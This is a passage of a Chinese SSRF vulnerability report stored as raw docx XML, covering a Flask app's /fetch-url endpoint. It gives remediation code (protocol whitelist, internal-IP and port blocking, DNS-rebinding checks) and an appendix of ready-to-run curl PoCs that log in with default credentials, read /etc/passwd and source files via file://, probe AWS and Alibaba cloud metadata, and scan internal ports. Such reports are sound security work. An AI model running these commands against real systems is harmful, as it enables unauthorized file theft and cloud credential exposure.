          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 下载所有敏感文件</w:t>
        <w:br/>
        <w:t>→ app.py 源码</w:t>
        <w:br/>
        <w:t>→ users.db 数据库</w:t>
        <w:br/>
        <w:t>→ .env 环境变量</w:t>
        <w:br/>
        <w:t>→ ssh私钥</w:t>
        <w:br/>
        <w:t>→ 数据库备份文件</w:t>
        <w:br/>
        <w:t>→ 日志文件（含其他用户Session）</w:t>
        <w:br/>
        <w:br/>
        <w:t># 最终完成：从SSRF到完全控制服务器！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>十、修复方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.1 协议白名单</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>from urllib.parse import urlparse</w:t>
        <w:br/>
        <w:br/>
        <w:t>def is_safe_url(url):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    """只允许 http/https 协议"""</w:t>
        <w:br/>
        <w:t xml:space="preserve">    parsed = urlparse(url)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return parsed.scheme in ("http", "https")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.2 内网IP拦截</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>import socket</w:t>
        <w:br/>
        <w:br/>
        <w:t>def is_internal_ip(hostname):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    """检查是否为内网IP"""</w:t>
        <w:br/>
        <w:t xml:space="preserve">    try:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ip = socket.gethostbyname(hostname)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    except:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return True</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # 拦截内网地址</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if ip.startswith(("127.", "10.", "172.16", "172.17",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                      "172.18", "172.19", "172.20", "172.21",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                      "172.22", "172.23", "172.24", "172.25",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                      "172.26", "172.27", "172.28", "172.29",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                      "172.30", "172.31", "192.168.", "169.254.")):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return True</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if ip == "0.0.0.0":</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return True</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return False</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.3 完整修复方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>@app.route("/fetch-url", methods=["POST"])</w:t>
        <w:br/>
        <w:t>@login_required</w:t>
        <w:br/>
        <w:t>def fetch_url():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    url = request.form.get("url", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
        <w:br/>
        <w:t xml:space="preserve">    # 1. 协议白名单</w:t>
        <w:br/>
        <w:t xml:space="preserve">    parsed = urlparse(url)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if parsed.scheme not in ("http", "https"):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "不允许的协议"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
        <w:br/>
        <w:t xml:space="preserve">    # 2. 内网IP拦截</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if is_internal_ip(parsed.hostname):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "不允许访问内网地址"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
        <w:br/>
        <w:t xml:space="preserve">    # 3. DNS重绑防护：二次解析校验</w:t>
        <w:br/>
        <w:t xml:space="preserve">    import time</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ip1 = socket.gethostbyname(parsed.hostname)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    time.sleep(0.1)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ip2 = socket.gethostbyname(parsed.hostname)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if ip1 != ip2:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "DNS解析异常"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
        <w:br/>
        <w:t xml:space="preserve">    # 4. 限制端口范围</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if parsed.port and parsed.port not in (80, 443, 8080):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "不允许的端口"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
        <w:br/>
        <w:t xml:space="preserve">    # 5. 超时限制（已有）</w:t>
        <w:br/>
        <w:t xml:space="preserve">    with urllib.request.urlopen(req, timeout=10) as response:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.4 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防护项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协议限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>无（支持file://）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>仅 http/https</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>内网IP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拦截127.0.0.1/10.x/192.168.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>云元数据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拦截169.254.x/100.100.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>端口限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>无限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>限制80/443/8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>DNS重绑</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>无防护</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>二次解析校验</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>附录：POC代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>以下POC可复制到终端直接测试SSRF漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>POC 1: 基础SSRF测试</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>#!/bin/bash</w:t>
        <w:br/>
        <w:t># 先登录获取Cookie</w:t>
        <w:br/>
        <w:t>curl -c /tmp/cookies.txt http://target/login &gt; /dev/null</w:t>
        <w:br/>
        <w:t>CSRF=$(curl -b /tmp/cookies.txt http://target/login 2&gt;&amp;1</w:t>
        <w:br/>
        <w:t xml:space="preserve">  | grep -oP 'value="[a-f0-9]{32}"' | head -1</w:t>
        <w:br/>
        <w:t xml:space="preserve">  | grep -oP '[a-f0-9]{32}')</w:t>
        <w:br/>
        <w:t>curl -b /tmp/cookies.txt -c /tmp/cookies.txt \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://target/login \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d "username=admin&amp;password=admin123&amp;csrf_token=${CSRF}"</w:t>
        <w:br/>
        <w:br/>
        <w:t># 测试SSRF：访问内网</w:t>
        <w:br/>
        <w:t>curl -b /tmp/cookies.txt -X POST \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d "url=http://127.0.0.1:5000/" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://target/fetch-url</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>POC 2: 文件读取</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -b /tmp/cookies.txt -X POST \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d "url=file:///etc/passwd" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://target/fetch-url</w:t>
        <w:br/>
        <w:br/>
        <w:t>curl -b /tmp/cookies.txt -X POST \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d "url=file:///workspace/user-management-platform/app.py" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://target/fetch-url</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>POC 3: 云元数据探测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># AWS</w:t>
        <w:br/>
        <w:t>curl -b /tmp/cookies.txt -X POST \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d "url=http://169.254.169.254/latest/meta-data/" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://target/fetch-url</w:t>
        <w:br/>
        <w:br/>
        <w:t># 阿里云</w:t>
        <w:br/>
        <w:t>curl -b /tmp/cookies.txt -X POST \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d "url=http://100.100.100.200/latest/meta-data/" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://target/fetch-url</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>POC 4: 内网端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>#!/bin/bash</w:t>
        <w:br/>
        <w:t>for port in 22 80 443 3306 6379 8080 9000 27017; do</w:t>
        <w:br/>
        <w:t xml:space="preserve">  result=$(curl -s -o /dev/null -w "%{http_code} %{time_total}" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    -b /tmp/cookies.txt -X POST \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    -d "url=http://127.0.0.1:${port}/" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    http://target/fetch-url)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  echo "Port ${port}: ${result}"</w:t>
        <w:br/>
        <w:t>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